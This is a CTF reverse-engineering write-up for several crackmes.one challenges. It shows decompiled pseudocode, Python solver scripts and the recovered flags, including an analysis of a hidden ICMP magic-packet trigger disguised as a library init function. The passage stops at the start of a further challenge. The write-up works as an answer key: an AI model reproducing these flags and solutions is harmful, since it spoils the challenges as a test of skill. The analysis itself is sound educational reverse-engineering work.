Crackmes.one Reverse Engineering CTF 2026 WriteUp

29k 词

Easy

CryptPad

The main logic is in sub_4014EB:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
CHAR __stdcall sub_4014EB(LPSTR lpMem, DWORD NumberOfBytesWritten, int a3)
{
if ( a3 )
{
if ( a3 != 1 )
return MessageBoxA(0, 0, 0, 0);
}
else
{
count = *(_DWORD *)&lpMem[NumberOfBytesWritten - 1];
src = &lpMem[NumberOfBytesWritten - 1 - count];
qmemcpy(dst_, src, count);
NumberOfBytesWritten_1 = *((_DWORD *)src - 1);
*((_DWORD *)src - 1) = 0;
NumberOfBytesWritten = NumberOfBytesWritten_1;
}
v7 = lpMem;
dst = dst_;
NumberOfBytesWritten_2 = ::NumberOfBytesWritten;
LABEL_6:
v10 = 0;
do
{
*v7++ ^= *dst++;
if ( ++v10 == 8 )
goto LABEL_6;
--NumberOfBytesWritten_2;
}
while ( NumberOfBytesWritten_2 );
n256 = 256;
do
{
Sbox[(unsigned __int8)-(char)n256] = -(char)n256;
--n256;
}
while ( n256 );
v12 = &unk_403695;
n256_1 = 256;
n8 = 0;
do
{
if ( n8 >= 8 )
n8 = 0;
*v12++ = dst_[n8++];
--n256_1;
}
while ( n256_1 );
v15 = 0;
v16 = v12 - 256;
v17 = 0;
n256_2 = 256;
do
{
LOBYTE(v15) = Sbox[v17] + v16[v17] + v15;
v19 = Sbox[v17];
Sbox[v17] = Sbox[v15];
Sbox[v15] = v19;
++v17;
--n256_2;
}
while ( n256_2 );
v20 = lpMem;
v21 = 0;
v22 = 0;
NumberOfBytesWritten_3 = NumberOfBytesWritten;
do
{
NumberOfBytesWritten_4 = NumberOfBytesWritten_3;
v24 = (unsigned __int8)(v21 + 1);
v32 = v20;
v25 = Sbox[v24];
LOBYTE(v22) = v25 + v22;
v26 = Sbox[v22];
Sbox[v24] = v26;
Sbox[v22] = v25;
LOBYTE(v24) = Sbox[(unsigned __int8)(v25 + v26)] ^ lpMem[v21];
v20 = v32;
v32[v21++] = v24;
NumberOfBytesWritten_3 = NumberOfBytesWritten_4 - 1;
}
while ( NumberOfBytesWritten_4 != 1 );
v27 = lpMem;
dst_1 = dst_;
NumberOfBytesWritten_5 = ::NumberOfBytesWritten;
LABEL_20:
v30 = 0;
do
{
result = *dst_1 ^ *v27;
*v27++ = result;
++dst_1;
if ( ++v30 == 8 )
goto LABEL_20;
--NumberOfBytesWritten_5;
}
while ( NumberOfBytesWritten_5 );
if ( a3 == 1 )
{
dst_2 = &lpMem[NumberOfBytesWritten - 13 + dword_403581];
*(_DWORD *)dst_2 = NumberOfBytesWritten;
dst_2 += 4;
qmemcpy(dst_2, dst_, 8u);
dst_2[8] = 8;
return dword_403581 + NumberOfBytesWritten;
}
return result;
}

This is a Xor-RC4-Xor, and the xor key is DE BC 0A 89 67 45 23 01, RC4 key has 8 bytes and was saved to the file’s end, as the structure is 4 byte message length + key + key length (8). The RC4 key is E8 17 1B F4 50 3F 3D 70.

CMO{r0ll_y0ur_0wn_b4d_c0d3}

FLRSCRNSVR.SCR

The main logic:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
LSTATUS __fastcall sub_140001AE0(wchar_t *Source)
{
cbData = 512;
if ( !RegOpenKeyExW(HKEY_CURRENT_USER, L"Control Panel\\Desktop", 0, 0x20019u, &hKey) )
{
if ( !RegQueryValueExW(hKey, L"Wallpaper", 0, 0, Data, &cbData) )
Type[0] = 1;
RegCloseKey(hKey);
}
hdc = GetDC(0);
hdc_1 = CreateCompatibleDC(hdc);
ho = CreateCompatibleBitmap(hdc, 1, 1);
DeleteObject(ho);
DeleteDC(hdc_1);
ReleaseDC(0, hdc);
n5 = 5;
if ( RegOpenKeyExW(HKEY_CURRENT_USER, L"Software\\FLRSCRNSVR", 0, 0x20019u, &phkResult) )
{
wcscpy_s(Source, 0x100u, L"Crackmes.one");
}
else
{
QueryPerformanceCounter(&PerformanceCount);
Type[0] = sub_140001010() + 1;
GetSystemMetrics(0);
lpcbData = 512;
if ( GetWindowsDirectoryW(Buffer, 0x104u) )
{
wcscat_s(Buffer, 0x104u, L"*.dll");
hFindFile = FindFirstFileW(Buffer, &FindFileData);
if ( hFindFile != (HANDLE)-1LL )
FindClose(hFindFile);
}
if ( RegQueryValueExW(phkResult, L"Text", 0, Type, (LPBYTE)Source, &lpcbData) )
{
hWnd = GetDesktopWindow();
IsWindow(hWnd);
wcscpy_s(Source, 0x100u, L"Crackmes.one");
hdc_2 = GetDC(0);
hdc_3 = CreateCompatibleDC(hdc_2);
ho_1 = CreateCompatibleBitmap(hdc_2, 1, 1);
DeleteObject(ho_1);
DeleteDC(hdc_3);
ReleaseDC(0, hdc_2);
}
else
{
v23 = 0;
n5_1 = 5;
do
{
++v23;
--n5_1;
}
while ( n5_1 );
if ( !wcsnlen(Source, 0x100u) )
wcscpy_s(Source, 0x100u, L"Crackmes.one");
}
GetSystemMetrics(0);
RegCloseKey(phkResult);
}
n25 = -1;
do
++n25;
while ( Source[n25] );
if ( n25 == 25 )
{
v24 = 0;
n5_2 = 5;
do
{
++v24;
--n5_2;
}
while ( n5_2 );
wcscpy_s(Destination, 0x100u, Source);
Type[0] = GetSystemMetrics(0);
sub_140001300((__int64)Destination);
hWnd_1 = GetDesktopWindow();
IsWindow(hWnd_1);
sub_140001890(Destination_);
Type[0] = GetSystemMetrics(0);
v25 = 0;
do
{
++v25;
--n5;
}
while ( n5 );
p_Destination = Destination;
do
{
v16 = p_Destination[520];
v17 = *p_Destination - v16;
if ( v17 )
break;
++p_Destination;
}
while ( v16 );
if ( v17 )
{
hdc_4 = GetDC(0);
hdc_5 = CreateCompatibleDC(hdc_4);
ho_2 = CreateCompatibleBitmap(hdc_4, 1, 1);
DeleteObject(ho_2);
DeleteDC(hdc_5);
return ReleaseDC(0, hdc_4);
}
else
{
h = GetStockObject(4);
result = GetObjectW(h, 16, &PerformanceCount);
byte_140008898 = 1;
}
}
else
{
result = RegOpenKeyExW(HKEY_CURRENT_USER, L"Control Panel\\Desktop", 0, 0x20019u, (PHKEY)Type);
if ( !result )
return RegCloseKey(*(HKEY *)Type);
}
return result;
}

The sub_140001300 is the encrypt function:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
__int16 __fastcall sub_140001300(__int64 p_Destination)
{
dwErrCode[0] = GetTickCount() % 0x64 + 5;
SetLastError(dwErrCode[0]);
wcscpy_s(Destination, 0x50u, L"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOP");
hWnd = GetDesktopWindow();
IsWindow(hWnd);
wcscat_s(Destination, 0x50u, L"QRSTUVWXYZ0123456789}_{=-");
nSize = 32;
if ( GetComputerNameW(Buffer, &nSize) )
dwErrCode[0] = Buffer[0];
wcscpy_s(Destination_, 0x50u, L"-={_}9876543210ZYXWVUTSRQPONMLKJIHGF");
hdc = GetDC(0);
hdc_1 = CreateCompatibleDC(hdc);
ho = CreateCompatibleBitmap(hdc, 1, 1);
DeleteObject(ho);
DeleteDC(hdc_1);
ReleaseDC(0, hdc);
hdc_2 = GetDC(0);
hdc_3 = CreateCompatibleDC(hdc_2);
ho_1 = CreateCompatibleBitmap(hdc_2, 1, 1);
DeleteObject(ho_1);
DeleteDC(hdc_3);
ReleaseDC(0, hdc_2);
wcscat_s(Destination_, 0x50u, L"EDCBAzyxwvutsrqponmlkjihgfedcba");
h = GetStockObject(4);
GetObjectW(h, 16, pv);
v10 = -1;
v11 = -1;
do
++v11;
while ( *(_WORD *)(p_Destination + 2 * v11) );
v12 = 0;
n5 = 5;
dwErrCode[0] = 0;
n5_1 = 5;
do
{
++dwErrCode[0];
--n5_1;
}
while ( n5_1 );
for ( i = 0; i < v11; ++i )
{
hWnd_1 = GetDesktopWindow();
IsWindow(hWnd_1);
v17 = wcschr(Destination, *(_WORD *)(p_Destination + 2 * i));
if ( v17 )
{
dwErrCode[0] = 0;
n5_2 = 5;
do
{
++dwErrCode[0];
--n5_2;
}
while ( n5_2 );
*(_WORD *)(p_Destination + 2 * i) = Destination_[v17 - Destination];
}
if ( !RegOpenKeyExW(HKEY_CURRENT_USER, L"Control Panel\\Desktop", 0, 0x20019u, &hKey) )
RegCloseKey(hKey);
}
h_1 = GetStockObject(4);
GetObjectW(h_1, 16, pv_);
v32[0] = 'L\0F';
dwErrCode[0] = 0;
do
{
++dwErrCode[0];
--n5;
}
while ( n5 );
v32[1] = 'R\0A';
v32[2] = 'R\0E';
h_2 = GetStockObject(4);
GetObjectW(h_2, 16, pv__1);
TickCount = GetTickCount();
SetLastError(TickCount % 0x64 + 5);
v32[3] = 'L\0A';
v32[4] = 'F';
dwErrCode[0] = GetSystemMetrics(0);
hdc_4 = GetDC(0);
hdc_5 = CreateCompatibleDC(hdc_4);
ho_2 = CreateCompatibleBitmap(hdc_4, 1, 1);
DeleteObject(ho_2);
DeleteDC(hdc_5);
ReleaseDC(0, hdc_4);
do
++v10;
while ( *((_WORD *)v32 + v10) );
v25 = RegOpenKeyExW(HKEY_CURRENT_USER, L"Control Panel\\Desktop", 0, 0x20019u, &phkResult);
if ( !v25 )
LOWORD(v25) = RegCloseKey(phkResult);
for ( j = 0; j < v11; ++j )
{
if ( GetWindowsDirectoryW(FileName, 0x104u) )
{
wcscat_s(FileName, 0x104u, L"*.dll");
hFindFile = FindFirstFileW(FileName, &FindFileData);
if ( hFindFile != (HANDLE)-1LL )
FindClose(hFindFile);
}
LOWORD(v25) = *((_WORD *)v32 + j % v10) + j;
*(_WORD *)(p_Destination + 2 * j) ^= v25;
}
if ( v11 >> 1 )
{
v28 = (_WORD *)(p_Destination - 2 + 2 * v11);
do
{
if ( !RegOpenKeyExW(HKEY_CURRENT_USER, L"Control Panel\\Desktop", 0, 0x20019u, &hKey) )
RegCloseKey(hKey);
v29 = *(_WORD *)(p_Destination + 2 * v12);
if ( GetWindowsDirectoryW(FileName, 0x104u) )
{
wcscat_s(FileName, 0x104u, L"*.dll");
hFindFile_1 = FindFirstFileW(FileName, &FindFileData);
if ( hFindFile_1 != (HANDLE)-1LL )
FindClose(hFindFile_1);
}
*(_WORD *)(p_Destination + 2 * v12) = *v28;
*v28 = v29;
v25 = RegOpenKeyExW(HKEY_CURRENT_USER, L"Control Panel\\Desktop", 0, 0x20019u, (PHKEY)dwErrCode);
if ( !v25 )
LOWORD(v25) = RegCloseKey(*(HKEY *)dwErrCode);
++v12;
--v28;
}
while ( v12 < v11 >> 1 );
}
return v25;
}

This is a substitution-xor key+index-reverse, and the cipher is load in sub_140001890.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
cip = bytearray([0x3C, 0x51, 0x6A, 0x09, 0x02, 0x07, 0x25, 0x03, 0x30, 0x08, 0x04, 0x29, 0x68, 0x24, 0x01, 0x24, 0x18, 0x6B, 0x77, 0x0F, 0x70, 0x36, 0x02, 0x0E, 0x0B])

U1 = cip[::-1]
key = "FLARERALF"
decrypted = []
for j in range(25):
k = ord(key[j % len(key)]) + j
c = U1[j] ^ k
decrypted.append(c)

src_map = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789}_{=-"
dst_map = "-={_}9876543210ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba"
rev_map = {}
for i in range(len(dst_map)):
rev_map[dst_map[i]] = src_map[i]

flag_chars = []
for c in decrypted:
ch = chr(c)
if ch in rev_map: flag_chars.append(rev_map[ch])
else: flag_chars.append('?')

flag = ''.join(flag_chars)
print(flag)

CMO{frogt4s7ic_r3vers1ng}

RecordPlayer

WinMain:

1
2
3
4
5
6
7
int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
{
sub_1400032B0(dwInitParam, hInstance, lpCmdLine, *(_QWORD *)&nShowCmd);
DialogBoxParamW_w((LPARAM)dwInitParam, 0);
sub_140003570(dwInitParam);
return 0;
}

sub_1400032B0 initialized the interface:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
_QWORD *__fastcall sub_1400032B0(_QWORD *p_dwInitParam, HINSTANCE hInstance, __int64 lpCmdLine, __int64 nShowCmd)
{
p_dwInitParam_1 = p_dwInitParam;
sub_140002C20(p_dwInitParam, hInstance, 101, nShowCmd);
*p_dwInitParam = &MainDialog::`vftable';
v6 = p_dwInitParam + 11;
*(_OWORD *)(p_dwInitParam + 11) = 0;
p_dwInitParam[13] = 0;
p_dwInitParam[14] = 15;
*((_BYTE *)p_dwInitParam + 88) = 0;
v7 = operator new(0x1B8u);
if ( v7 )
v8 = sub_1400016F0(v7);
else
v8 = 0;
p_dwInitParam[10] = v8;
v19[0] = &std::_Func_impl_no_alloc<_lambda_254f7f3896517544d5a333cbd1c27e47_,void,std::string const &>::`vftable';
v19[1] = p_dwInitParam;
v20 = v19;
v23 = 0;
v23 = (_BYTE *)sub_140003A30(v19, v22);
sub_140003AD0((__int64)v22, v8 + 208);
if ( v23 )
{
LOBYTE(v9) = v23 != v22;
(*(void (__fastcall **)(_BYTE *, __int64))(*(_QWORD *)v23 + 32LL))(v23, v9);
}
if ( v20 )
{
LOBYTE(v9) = v20 != v19;
(*(void (__fastcall **)(_QWORD *, __int64))(*v20 + 32LL))(v20, v9);
}
v10 = operator new(0x48u);
if ( v10 )
v11 = sub_1400010C0(v10, 111, 110);
else
v11 = 0;
p_dwInitParam[4] = v11;
v12 = operator new(0x38u);
if ( v12 )
v13 = sub_140002EE0((int)v12, 1001, 106, 107, hInstance);
else
v13 = 0;
p_dwInitParam[7] = v13;
v14 = operator new(0x38u);
if ( v14 )
v15 = sub_140002EE0((int)v14, 1003, 104, 105, hInstance);
else
v15 = 0;
p_dwInitParam[8] = v15;
v16 = operator new(0x38u);
if ( v16 )
v17 = sub_140002EE0((int)v16, 1002, 102, 103, hInstance);
else
v17 = 0;
p_dwInitParam[9] = v17;
p_dwInitParam[5] = CreateSolidBrush(0x33312Fu);
p_dwInitParam[6] = CreateFontW(18, 0, 1, 0, 700, 0, 0, 0, 0, 0, 0, 2u, 0, L"Consolas");
if ( p_dwInitParam[14] > 0xFu )
v6 = (_QWORD *)*v6;
p_dwInitParam[13] = 0;
*(_BYTE *)v6 = 0;
return p_dwInitParam;
}

From Resource Hacker, the 106 & 107 is the play button, 104 & 105 is exit, and 102 & 103 is about. Also, the resource id 130 is the success page, and dialog id 134 is the success dialog.

Dialog function:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
INT_PTR __fastcall DialogFunc(HWND hWnd, unsigned int n272, __int64 a3, _QWORD *dwNewLong)
{
if ( n272 == 272 )
{
dwNewLong[2] = hWnd;
SetWindowLongPtrW(hWnd, -21, (LONG_PTR)dwNewLong);
return (*(int (__fastcall **)(_QWORD *))(*dwNewLong + 8LL))(dwNewLong);
}
else
{
result = GetWindowLongPtrW(hWnd, -21);
if ( result )
return (*(__int64 (__fastcall **)(INT_PTR, _QWORD, __int64, _QWORD *))(*(_QWORD *)result + 32LL))(result,n272,a3,dwNewLong);
}
return result;
}

The case GetWindowLongPtrW jump to this function:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
HGDIOBJ __fastcall sub_7FF68AAC3770(__int64 a1, unsigned int n32769, HDC hdc, __int64 a4)
{
if ( n32769 == 307 )
{
SetBkColor(hdc, 0x3F5D8Au);
SetTextColor(hdc, 0xFFFFFFu);
return *(HGDIOBJ *)(a1 + 40);
}
else if ( n32769 == 312 )
{
SetBkMode(hdc, 1);
return GetStockObject(5);
}
else
{
if ( n32769 == 32769 )
{
nShowCmd = sub_7FF68AAC31F0((__int64)v10, a1 + 88);
sub_7FF68AAC3D40((__int64)dwInitParam, *(HINSTANCE *)(a1 + 8), 134, nShowCmd);
DialogBoxParamW_w((LPARAM)dwInitParam, *(HWND *)(a1 + 16));
sub_7FF68AAC3EF0((__int64)dwInitParam);
}
return (HGDIOBJ)sub_7FF68AAC2D70(a1, n32769, hdc, a4);
}
}

Note that if ( n32769 == 32769 ) is just the right dialog (dialog 134). And if this value is 0x8001, the program will copy the string at a1+88 and show it. Search of PostMessageW find this function:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
void __fastcall sub_7FF68AAC3A60(__int64 a1, size_t *a2)
{
v2 = *(_QWORD *)(a1 + 8);
v3 = (void **)(v2 + 88);
if ( !*(_QWORD *)(v2 + 104) )
{
if ( v3 != (void **)a2 )
{
v4 = a2;
if ( a2[3] > 0xF )
v4 = (void *)*a2;
sub_7FF68AAC3C20(v3, v4, a2[2]);
}
PostMessageW(*(HWND *)(v2 + 16), 0x8001u, 0, 0);
}
}

And hardware breakpoint at a1+88 is triggered in:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
__int64 __fastcall sub_7FF68AAC3860(__int64 a1, __int16 a2)
{
switch ( a2 )
{
case 1001:
sub_7FF68AAC3C20((void **)(a1 + 88), &unk_7FF68AAC665A, 0);
v4 = *(_QWORD *)(a1 + 80);
if ( *(_BYTE *)(v4 + 28) )
{
sub_7FF68AAC27A0(v4);
}
else
{
sub_7FF68AAC1F50(v4, 141);
sub_7FF68AAC3A00(*(_QWORD *)(a1 + 80), 1u);
LOBYTE(v5) = 1;
sub_7FF68AAC3A20(*(_QWORD *)(a1 + 80), v5);
sub_7FF68AAC20F0(*(_QWORD *)(a1 + 80));
}
break;
case 1002:
nShowCmd_ = 0;
v7 = 0;
n15 = 15;
LOBYTE(nShowCmd_) = 0;
sub_7FF68AAC3D40((__int64)dwInitParam, *(HINSTANCE *)(a1 + 8), 132, (__int64)&nShowCmd_);
DialogBoxParamW_w((LPARAM)dwInitParam, *(HWND *)(a1 + 16));
sub_7FF68AAC3EF0((__int64)dwInitParam);
break;
case 1003:
EndDialog(*(HWND *)(a1 + 16), 0);
break;
default:
return 0;
}
return 1;
}

id 141 is just the sound’s id, this function is the logic of the play button. And this function is suspicious:

1
2
3
4
5
6
__int64 __fastcall sub_7FF68AAC3A00(__int64 a1, unsigned __int8 a2)
{
result = 2 * (a2 ^ 1u) - 1;
*(_DWORD *)(a1 + 24) = result;
return result;
}

As a2 = 1, this will return -1. So this is the first broken: the play direction. And the second broken is at sub_7FF68AAC3A20, change this 1 to 0, and play, the flag will show.

CMO{y0u_g0t_r1ckr0ll3d}

Intermediate

httpd

Notice that main.main has nothing useful, and text search find the source file /home/crudd/httpd3/httpd.go. Try to find all functions that belong to this file:

1
2
3
4
5
6
7
8
9
10
11
import idautils
import ida_funcs

output_file = "E:/CTF/temp/out.txt"

with open(output_file, "w") as f:
for func_ea in idautils.Functions():
func_name = ida_funcs.get_func_name(func_ea)
f.write("0x{:X}\n".format(func_ea))

print(f"[+] Exported {sum(1 for _ in idautils.Functions())} functions to {output_file}")
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import subprocess
import os
from tqdm import tqdm

def main():
input_file = "out.txt"
binary = "httpd"
target_path = "/home/crudd/httpd3/httpd.go"
with open(input_file, 'r') as f: lines = [line.strip() for line in f if line.strip()]
matched_addresses = []
for addr in tqdm(lines, desc="Addrs", unit="addr"):
clean_addr = addr.lower().replace('0x', '')
result = subprocess.run(['addr2line', '-e', binary, clean_addr], capture_output=True, text=True, timeout=10)
output = result.stdout + result.stderr
if target_path in output: matched_addresses.append(addr)
for addr in matched_addresses: print(addr)

if __name__ == "__main__":
main()

The output has 3 functions: main.main, main.handler and an extremely suspicious function net/http.init. In fact, this function is disguised as a library function, but it has a very complex logic, and it is the core logic:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
void __golang net_http_init_0()
{
device_1.str = (uint8 *)"re0";
device_1.len = 3;
v14 = github_com_google_gopacket_pcap_OpenLive(device_1, 1600, 1, -10000000);
tab = v14._b4.tab;
data = v14._b4.data;
if ( v14._b4.tab )
{
LABEL_37:
e._type = tab->_type;
e.data = data;
runtime_gopanic(e);
}
handle = v14.handle;
expr.str = (uint8 *)"icmp";
expr.len = 4;
v13 = github_com_google_gopacket_pcap__ptr_Handle_SetBPFFilter(v14.handle, expr);
if ( v13.tab )
{
e_1._type = v13.tab->_type;
e_1.data = v13.data;
runtime_gopanic(e_1);
goto LABEL_37;
}
v15 = github_com_google_gopacket_pcap__ptr_Handle_pcapDatalink(handle);
p_gopacket_PacketSource = (gopacket_PacketSource *)runtime_newobject((runtime__type_1 *)&RTYPE_gopacket_PacketSource);
p_gopacket_PacketSource->source.tab = go_itab__ptr_github_com_google_gopacket_pcap_Handle_comma_github_com_google_gopacket_PacketDataSource;
if ( *(_DWORD *)&runtime_writeBarrier.enabled )
runtime_gcWriteBarrierCX();
else
p_gopacket_PacketSource->source.data = handle;
p_gopacket_PacketSource->decoder.tab = go_itab_github_com_google_gopacket_layers_LinkType_comma_github_com_google_gopacket_Decoder;
if ( *(_DWORD *)&runtime_writeBarrier.enabled )
runtime_gcWriteBarrierCX();
else
p_gopacket_PacketSource->decoder.data = &runtime_staticuint64s[v15];
for ( c = (runtime_hchan_0 *)github_com_google_gopacket__ptr_PacketSource_Packets((github_com_google_gopacket_PacketSource *)p_gopacket_PacketSource);
;
c = c_1 )
{
promisc[0] = runtime_chanrecv2(c, &elem[1]);
if ( !promisc[0] )
break;
v4 = elem[1];
elem[1] = 0;
device_8 = (*(__int64 (__golang **)(_QWORD))(v4 + 32))(*((_QWORD *)&v4 + 1));
if ( timeout < 0x18 )
runtime_panicSliceAcap();
if ( timeout < 0x26 )
runtime_panicSliceAcap();
if ( timeout < 0x28 )
runtime_panicSliceAcap();
if ( timeout < 0x2E )
runtime_panicSliceAcap();
key_16 = device_8;
n0x22 = *(_QWORD *)promisc;
v40 = *(_DWORD *)(device_8 + 42);
v39 = *(_WORD *)(device_8 + 36);
array = runtime_makeslice((runtime__type_1 *)&RTYPE_uint8, 2, 2);
*array = __ROL2__(v39 ^ HIWORD(v40), 8);
v38 = __ROL2__(v40 ^ v39, 8);
device_8a.array = array;
device_8a.len = 2;
device_8a.cap = 2;
old = runtime_growslice((runtime__type_1 *)&RTYPE_uint8, device_8a, 6);
array_1 = old.array;
cap = old.cap;
key_1 = key_16;
*(_DWORD *)((char *)old.array + 2) = *(_DWORD *)(key_16 + 20);
if ( old.cap < 8uLL )
{
device_8b.array = old.array;
device_8b.len = 6;
device_8b.cap = old.cap;
olda = runtime_growslice((runtime__type_1 *)&RTYPE_uint8, device_8b, 8);
array_1 = olda.array;
cap = olda.cap;
key_1 = key_16;
}
array_1[3] = *(_WORD *)(key_1 + 36);
if ( cap < 0xC )
{
device_8c.array = array_1;
device_8c.len = 8;
device_8c.cap = cap;
oldb = runtime_growslice((runtime__type_1 *)&RTYPE_uint8, device_8c, 12);
array_1 = oldb.array;
cap = oldb.cap;
key_1 = key_16;
}
*((_DWORD *)array_1 + 2) = *(_DWORD *)(key_1 + 42);
if ( cap < 0xE )
{
device_8d.array = array_1;
device_8d.len = 12;
device_8d.cap = cap;
oldc = runtime_growslice((runtime__type_1 *)&RTYPE_uint8, device_8d, 14);
array_1 = oldc.array;
cap = oldc.cap;
key_1 = key_16;
}
array_1[6] = *(_WORD *)(key_1 + 38);
if ( cap < 0x10 )
{
device_8e.array = array_1;
device_8e.len = 14;
device_8e.cap = cap;
oldd = runtime_growslice((runtime__type_1 *)&RTYPE_uint8, device_8e, 16);
array_1 = oldd.array;
cap = oldd.cap;
key_1 = key_16;
}
array_1[7] = v38;
if ( *(_WORD *)(key_1 + 38) == 0x1337
&& __ROL2__(*(_WORD *)(key_1 + 16), 8) == 32
&& *(_DWORD *)(key_1 + 42) == 0xE55FDEC6 )
{
if ( n0x22 <= 0x22 )
runtime_panicIndex();
if ( *(_BYTE *)(key_1 + 34) == 8 )
{
cap_1 = cap;
key = (uint8 *)array_1;
b_8 = runtime_newobject((runtime__type_1 *)&RTYPE__32_uint8);
*b_8 = 0xC07EDFB429A5F151LL;
b_8[1] = 0xB34E3D248F2F3B2ALL;
b_8[2] = 0x8CDD9C0BCFB0ED5ALL;
b_8[3] = 0xC64C43E9B0EE6CDLL;
device.array = key;
device.len = 16;
device.cap = cap_1;
*(_OWORD *)&promisca.len = (unsigned __int128)crypto_aes_NewCipher(device);
ptr = (uint8 *)runtime_makeslice((runtime__type_1 *)&RTYPE_uint8, 32, 32);
devicea = *(string_0 *)&promisca.len;
promisca.array = key;
promisca.len = 16;
promisca.cap = cap_1;
olde = crypto_cipher_NewCBCDecrypter((crypto_cipher_Block)devicea, promisca);
((void (__golang *)(void *, uint8 *, __int64, __int64, _QWORD *, __int64, __int64))olde.tab[1].inter)(olde.data, ptr, 32, 32, b_8, 32, 32);
deviceb = runtime_slicebytetostring(0, ptr, 32);
promiscb = runtime_convTstring(deviceb);
*(_QWORD *)&elem[0] = &RTYPE_string;
*((_QWORD *)&elem[0] + 1) = promiscb;
devicec.str = (uint8 *)go_itab__ptr_os_File_comma_io_Writer;
devicec.len = (int)os_Stdout;
promiscc.array = (interface__0 *)elem;
promiscc.len = 1;
promiscc.cap = 1;
fmt_Fprintln((io_Writer_0)devicec, promiscc);
}
}
}
}

This function keeps waiting for ICMP packets, and if the length of packet is 32, type is 0x08, identifier is 0x1337, the first int32 of payload is 0xE55FDEC6, it will try to decrypt the 32 byte cipher, using AES. The key is constructed from some data in the package.

Decrypt:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
from Crypto.Cipher import AES

def n2ble(na, n=8):
b = bytearray()
for a in na: b.extend(a.to_bytes(n, "little"))
return bytes(b)

cip = [
0xC07EDFB429A5F151,
0xB34E3D248F2F3B2A,
0x8CDD9C0BCFB0ED5A,
0x0C64C43E9B0EE6CD,
]
CIPHERTEXT = n2ble(cip, 8)

PAYLOAD = bytes.fromhex("c6de5fe5")
IDENT_BYTES = bytes.fromhex("3713")

payload_le = int.from_bytes(PAYLOAD, "little")
hi16 = (payload_le >> 16) & 0xFFFF
lo16 = payload_le & 0xFFFF

def icmp_checksum(data: bytes) -> int:
if len(data) % 2 == 1: data += b"\x00"
s = 0
for i in range(0, len(data), 2):
w = (data[i] << 8) | data[i+1]
s += w
s = (s & 0xFFFF) + (s >> 16)
s = (s & 0xFFFF) + (s >> 16)
return (~s) & 0xFFFF

def build_key(ip_bytes_6_9: bytes, code: int, seq_bytes: bytes):
pseudo = bytes([8, code, 0, 0]) + IDENT_BYTES + seq_bytes + PAYLOAD
csum_be = icmp_checksum(pseudo)
csum_bytes = csum_be.to_bytes(2, "big")
csum_le = int.from_bytes(csum_bytes, "little")
a = (csum_le ^ hi16) & 0xFFFF
b = (csum_le ^ lo16) & 0xFFFF
key = (
a.to_bytes(2, "big") +
ip_bytes_6_9 +
csum_bytes +
PAYLOAD +
IDENT_BYTES +
b.to_bytes(2, "big")
)
return key

def decrypt(key: bytes) -> bytes: return AES.new(key, AES.MODE_CBC, iv=key).decrypt(CIPHERTEXT)

ip_candidates = [
bytes.fromhex("00004001"),
bytes.fromhex("40004001"),
bytes.fromhex("00008001"),
bytes.fromhex("40008001"),
]

codes = [0]
best = []
for ipb in ip_candidates:
for code in codes:
for seq in range(65536):
seq_bytes = seq.to_bytes(2, "little")
key = build_key(ipb, code, seq_bytes)
pt = decrypt(key)
if b"CMO{" in pt:
print(pt)
break

CMO{fUn_w1th_m4g1c_p4ck3t5}

connected

This program registered 10 IPs in main, and 9 lambda functions to parse the input:

IP_HEX IP Lambda Function ID Received
0x260FC72A 38.15.199.42 1 input
